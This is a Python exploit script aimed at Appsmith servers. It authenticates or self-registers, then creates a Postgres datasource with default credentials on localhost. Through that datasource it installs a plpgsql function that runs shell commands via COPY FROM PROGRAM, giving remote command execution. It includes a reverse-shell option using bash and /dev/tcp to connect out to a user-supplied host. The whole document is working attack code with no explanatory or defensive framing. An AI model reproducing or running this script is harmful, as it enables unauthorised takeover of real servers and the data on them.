#!/usr/bin/env python3 import sys, json, random, string, re, urllib3, requests from urllib.parse import urljoin, urlencode urllib3.disable_warnings() rand = lambda n=8: ''.join(random.choices(string.ascii_lowercase + string.digits, k=n)) SQL_SETUP = """ CREATE TABLE IF NOT EXISTS cmd_output (line text); CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS TABLE(line text) AS $$ BEGIN TRUNCATE TABLE cmd_output; EXECUTE format('COPY cmd_output FROM PROGRAM %L', cmd); RETURN QUERY SELECT t.line FROM cmd_output t; END; $$ LANGUAGE plpgsql; """ def die(msg, resp=None): print("ERROR:", msg) if resp is not None: print(resp.status_code, resp.text[:300]) sys.exit(1) json_ct = lambda r: r.headers.get("content-type", "").startswith("application/json") first_id = lambda xs: xs[0]["id"] if xs else None def fetch_csrf(sess, base): for p in ("/csrf", "/api/v1/users/csrfToken", "/api/v1/csrf"): r = sess.get(urljoin(base, p), headers={"Accept": "application/json"}) if r.ok and json_ct(r) and "token" in r.text: return r.json().get("token") r = sess.get(urljoin(base, "/user/signup")) m = re.search(r'name="_csrf"\s+value="([^"]+)"', r.text) or \ re.search(r']+name="_csrf"[^>]+content="([^"]+)"', r.text) if m: return m.group(1) sess.get(urljoin(base, "/api/v1/users/me"), headers={"X-Requested-With": "XMLHttpRequest"}) return sess.cookies.get("XSRF-TOKEN") def try_login(sess, base, email, pw): print(f"[+] trying login for {email}") sess.post(urljoin(base, "/api/v1/login"), data=urlencode({"username": email, "password": pw}), headers={"Content-Type": "application/x-www-form-urlencoded"}, allow_redirects=False) r = sess.get(urljoin(base, "/api/v1/users/me")) if r.ok and json_ct(r) and r.json().get("data", {}).get("email") == email: print("[+] login succeeded") return True print("[-] login failed") return False def try_signup(sess, base, email, pw): print(f"[+] attempting signup with {email}") data = {"email": email, "password": pw} csrf = fetch_csrf(sess, base) if csrf: data["_csrf"] = csrf r = sess.post(urljoin(base, "/api/v1/users"), data=data, headers={"Content-Type": "application/x-www-form-urlencoded", "Origin": base, "Referer": urljoin(base, "/user/signup")}, allow_redirects=False) if r.status_code in (200, 201, 302): print("[+] registration succeeded") return True print("[-] registration failed") return False def get_workspace(sess, base): for p in ("/api/v1/workspaces/home", "/api/v1/workspaces"): r = sess.get(urljoin(base, p)) if r.ok and json_ct(r) and r.json().get("data"): return r.json()["data"][0]["id"] r = sess.get(urljoin(base, "/api/v1/users/me")) if r.ok and json_ct(r): j = r.json().get("data", {}) for key in ("workspaces", "workspaceDTOs"): if j.get(key): return j[key][0]["id"] die("no workspace found – open the UI once to finish onboarding") def pick_environment(sess, base, ws): # modern servers r = sess.get(urljoin(base, f"/api/v1/environments/workspaces/{ws}")) if r.ok and r.json().get("data"): return r.json()["data"][0]["id"] # try to create one (mid-2023 builds) r = sess.post(urljoin(base, "/api/v1/environments"), json={"name": "PROD", "workspaceId": ws}) if r.ok and r.json().get("data"): return r.json()["data"]["id"] # Older servers do not use environmentId print("[*] legacy server – operating without environmentId") return "" def create_app(sess, base, ws, name): # some versions take workspaceId as paramter, it will fallback and submit as JSON if required r = sess.post(urljoin(base, f"/api/v1/applications?workspaceId={ws}"), json={"name": name}) if r.status_code == 201: return first_id(r.json()["data"]["pages"]) r = sess.post(urljoin(base, "/api/v1/applications"), json={"name": name, "workspaceId": ws}) if r.status_code == 201: return first_id(r.json()["data"]["pages"]) die("app create failed", r) def create_action(sess, base, page_id, plugin_id, ds_id, name, body): payload = {"pluginSpecifiedTemplates": [{"value": True}], "body": body} r = sess.post(urljoin(base, "/api/v1/actions"), json={ "name": name, "pageId": page_id, "pluginId": plugin_id, "datasource": {"id": ds_id}, "actionConfiguration": payload }) if r.status_code != 201: die(f"create {name} failed", r) return r.json()["data"]["id"] def exec_action(sess, base, aid, env, tolerant=False): dto = {"actionId": aid, "viewMode": False, "paramProperties": {}, "analyticsProperties": {"isUserInitiated": True}} files = {"executeActionDTO": (None, json.dumps(dto), "application/json")} hdrs = dict(sess.headers) if env: hdrs["environmentId"] = env r = sess.post(urljoin(base, "/api/v1/actions/execute"), headers=hdrs, files=files) if not r.ok and not tolerant: die(f"execute {aid} failed", r) data = r.json().get("data", {}) if json_ct(r) else {} if not tolerant and not data.get("isExecutionSuccess", False): die(f"action {aid} not successful", r) return data USAGE = f"{sys.argv[0]} [cmd] | -revshell " if len(sys.argv) < 4: die(USAGE) base, email, pw = [a.rstrip("/") for a in sys.argv[1:4]] if len(sys.argv) >= 5 and sys.argv[4] == "-revshell": if len(sys.argv) != 7: die(USAGE) cmd = f"bash -c 'bash -i >& /dev/tcp/{sys.argv[5]}/{sys.argv[6]} 0>&1'" revshell = True else: cmd = sys.argv[4] if len(sys.argv) >= 5 else "id" revshell = False print("command:", cmd) sess = requests.Session() sess.verify = False sess.headers["X-Requested-By"] = "Appsmith" if not (try_login(sess, base, email, pw) or (try_signup(sess, base, email, pw) and try_login(sess, base, email, pw))): die("authentication failed") ws = get_workspace(sess, base) print("workspace_id:", ws) env = pick_environment(sess, base, ws) print("environment_id:", env or "") pg = None for p in ("/api/v1/plugins", "/api/v1/plugins/default/icons"): r = sess.get(urljoin(base, p)) if r.ok and json_ct(r): for pl in r.json().get("data", []): if pl.get("name", "").lower().startswith("postgres"): pg = pl["id"]; break if pg: break if not pg: die("postgres plugin not found") print("postgres_plugin_id:", pg) apps = sess.get(urljoin(base, "/api/v1/applications")).json().get("data", []) page_id = first_id(apps[0]["pages"]) if apps else create_app( sess, base, ws, f"auto_{rand()}" ) print("page_id:", page_id) env_key = env or ws conf = { "authentication": {"databaseName": "postgres", "username": "postgres", "password": "postgres"}, "endpoints": [{"host": "localhost", "port": "5432"}], "connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}} } ds_body = { "name": f"pg_{rand()}", "pluginId": pg, "workspaceId": ws, "datasourceStorages": { env_key: {"isConfigured": True, "datasourceConfiguration": conf} } } res = sess.post(urljoin(base, "/api/v1/datasources"), json=ds_body) if res.status_code != 201: die("datasource create", res) ds_id = res.json()["data"]["id"] print("datasource_id:", ds_id) # test DB connectivity. skip if legacy if env: j = sess.post(urljoin(base, "/api/v1/datasources/test"), json={ "datasourceId": ds_id, "environmentId": env, "datasourceConfiguration": conf, "pluginId": pg, "workspaceId": ws }).json().get("data", {}) if not (j.get("valid") or j.get("success")): die("datasource test failed") print("postgres reachable") else: print("postgres test skipped (legacy)") setup_id = create_action(sess, base, page_id, pg, ds_id, "setup_cmd_objects", SQL_SETUP) run_sql = f"SELECT * FROM exec_cmd('{cmd.replace('\'','\'\'')}');" run_id = create_action(sess, base, page_id, pg, ds_id, "run_command", run_sql) exec_action(sess, base, setup_id, env) print("setup executed") if revshell: exec_action(sess, base, run_id, env, tolerant=True) print("attempted to execute reverse shell") else: out = exec_action(sess, base, run_id, env) rows = out.get("body", []) if isinstance(rows, list) and all(isinstance(x, dict) for x in rows): for i, row in enumerate(rows, 1): print(f"{i:03}: {row.get('line')}") else: print(json.dumps(rows, indent=2))